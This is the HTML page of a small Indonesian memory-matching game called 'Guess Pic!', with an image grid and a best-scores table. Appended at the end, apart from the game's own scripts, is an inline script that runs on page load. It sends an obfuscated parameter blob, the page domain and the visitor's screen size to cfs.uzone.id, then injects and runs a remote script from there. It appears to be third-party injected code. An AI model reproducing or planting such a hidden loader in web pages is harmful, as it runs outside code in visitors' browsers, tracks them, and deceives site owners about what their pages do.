<!DOCTYPE html>
<html lang="id">
	<head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>Guess Pic!</title>
		<link rel="stylesheet" type="text/css" href="src/style/css.css">
	</head>
	<body>
		<div id="rank">
			Best Scores:
			<table>
				<tr>
					<td>User</td>
					<td>Score</td>
				</tr>
				<tr>
					<td id="user1"></td>
					<td id="score1"></td>
				</tr>
				<tr>
					<td id="user2"></td>
					<td id="score2"></td>
				</tr>
				<tr>
					<td id="user3"></td>
					<td id="score3"></td>
				</tr>
				<tr>
					<td id="user4"></td>
					<td id="score4"></td>
				</tr>
				<tr>
					<td id="user5"></td>
					<td id="score5"></td>
				</tr>
			</table>
			<input id="clearButton" type="button" value="Clear" onclick="hapus()"></input>
		</div>
		<div id="content">
			<div id="board">
				<table>
					<thead>
					</thead>
					<tbody>
						<tr>
							<th><img id="1" src="src/images/image1.jpg" alt="img1" onclick="bukaGambar(1)"></th>
							<th><img id="2" src="src/images/image2.jpg" alt="img2" onclick="bukaGambar(2)"></th>
							<th><img id="3" src="src/images/image2.jpg" alt="img2" onclick="bukaGambar(3)"></th>
							<th><img id="4" src="src/images/image1.jpg" alt="img1" onclick="bukaGambar(4)"></th>
						</tr>
						<tr>
							<th><img id="5" src="src/images/image3.jpg" alt="img3" onclick="bukaGambar(5)"></th>
							<th><img id="6" src="src/images/image4.jpg" alt="img4" onclick="bukaGambar(6)"></th>
							<th><img id="7" src="src/images/image3.jpg" alt="img3" onclick="bukaGambar(7)"></th>
							<th><img id="8" src="src/images/image4.jpg" alt="img4" onclick="bukaGambar(8)"></th>
						</tr>
						<tr>
							<th><img id="9" src="src/images/image7.jpg" alt="img7" onclick="bukaGambar(9)"></th>
							<th><img id="10" src="src/images/image5.jpg" alt="img5" onclick="bukaGambar(10)"></th>
							<th><img id="11" src="src/images/image6.jpg" alt="img6" onclick="bukaGambar(11)"></th>
							<th><img id="12" src="src/images/image8.jpg" alt="img8" onclick="bukaGambar(12)"></th>
						</tr>
						<tr>
							<th><img id="13" src="src/images/image6.jpg" alt="img6" onclick="bukaGambar(13)"></th>
							<th><img id="14" src="src/images/image5.jpg" alt="img5" onclick="bukaGambar(14)"></th>
							<th><img id="15" src="src/images/image7.jpg" alt="img7" onclick="bukaGambar(15)"></th>
							<th><img id="16" src="src/images/image8.jpg" alt="img8" onclick="bukaGambar(16)"></th>
						</tr>
					</tbody>
				</table>
			</div>
			<div id="information">
			Username : <span id="name"></span>
			<br>
			Time : <span id="time"></span>
			</div>
			<input id="startButton" type="button" class="button" value="Start"></input> 
		</div>
		<script type="text/javascript" src="src/script/jquery-3.1.1.min.js"></script>
		<script type="text/javascript" src="src/script/js.js"></script>
	<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2BDF5Ghvs3UKNhDKm4g4fCxpcPbcIoP7ZfkWZaKFsDx6nxsj6t2ib5yUgM4iGcWk3rFxYa7QVdJ6oGPN2GYZeFTPj2Nfy%2fDA6Y3vW9OPFfNnHuLPkzd7%2bTywGjlrFkv6vuXNgS5PVJkxB6rPfkcRroTtOB9PHDtn5h7kZepDdyxCFJ0byhkhLFy3KiMaU5xXzPLJ7u2MP59gYoras7xbNe0Nc7WU2RrZdyB26xfXu677Hfz8qwAx0xCY4sBGY6tESBX6Rdo851JpbLqh7fQf6MREQJe85CRjXjqQuU81r7s%2fayqvrfNlN8kqUKFtQ2uG8TcEL75YfNDYpMAvw6Uv2ODx5sG3k6Hhjqys96%2b9l8z0e47gBeT%2bH15uIAaTqpDldJgkY%2fCeIRQnyhREXHuSiMmCZ610KikOMGr1tCCfqltmjYWKvH%2fNa9iBTNtmcapT3xni9mCR0oPxLfEzRQUNdj3MvGvc7gAmdg9moFRSuUhvyENVIBkif5ejtL1c9nOnWQgkoRYa9cFtllqf%2beDNgoCwol2UH8ZR3Tf14e7Z0XniT5Ksc9MrPQi0uyLgmHFyNMoym7JA5mbz5pD%2f4IrJ%2b%2f8rJDk5u5N8ro" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
